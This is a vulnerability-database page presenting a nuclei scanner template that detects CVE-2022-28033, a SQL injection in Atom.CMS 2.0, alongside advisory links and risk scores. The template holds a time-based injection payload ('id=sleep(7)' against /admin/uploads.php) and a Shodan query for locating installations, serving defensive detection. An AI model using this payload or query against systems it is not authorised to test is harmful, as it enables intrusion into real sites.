Lucene search
K

Atom.CMS 2.0 - SQL Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

Atom.CMS 2.0 SQL Injection vulnerability allows arbitrary SQL commands execution leading to unauthorized access, data leakage, and potential data manipulation. Apply latest security patches to mitigate

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-28033
12 Apr 202216:15
attackerkb
Circl
CVE-2022-28033
12 Apr 202220:23
circl
CNNVD
Atom.CMS SQL注入漏洞
12 Apr 202200:00
cnnvd
CNVD
Atom.CMS SQL Injection Vulnerability (CNVD-2022-30776)
15 Apr 202200:00
cnvd
CVE
CVE-2022-28033
12 Apr 202215:16
cve
Cvelist
CVE-2022-28033
12 Apr 202215:16
cvelist
NVD
CVE-2022-28033
12 Apr 202216:15
nvd
OSV
CVE-2022-28033
12 Apr 202216:15
osv
Prion
Sql injection
12 Apr 202216:15
prion
RedhatCVE
CVE-2022-28033
22 May 202522:40
redhatcve
Rows per page
id: CVE-2022-28033

info:
  name: Atom.CMS 2.0 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    Atom.CMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_uploads.php which allows an attacker to execute arbitrary SQL commands.
  impact: |
    Successful exploitation could lead to unauthorized access, data leakage, and potential data manipulation.
  remediation: |
    Apply the latest security patches provided by the vendor to mitigate the SQL Injection vulnerability in Atom.CMS 2.0.
  reference:
    - https://github.com/thedigicraft/Atom.CMS/issues/259
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28033
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-28033
    cwe-id: CWE-89
    epss-score: 0.05412
    epss-percentile: 0.91691
    cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: thedigitalcraft
    product: atomcms
    shodan-query: html:"atomcms"
  tags: cve,cve2022,atom,cms,sqli,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "atomcms")'
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET /admin/uploads.php?id=sleep(7) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'contains(body, "WHERE id")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100d6d4d4ec0fb4872948637d038e22cfaf922276e5be261a7c4ceda10a96c5119e022100ab54be2b37f00f3ab92eb857792f59c462443ff7a3c1da82c6c047feaeedc819:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 27.5
CVSS 3.19.8
EPSS0.05412
34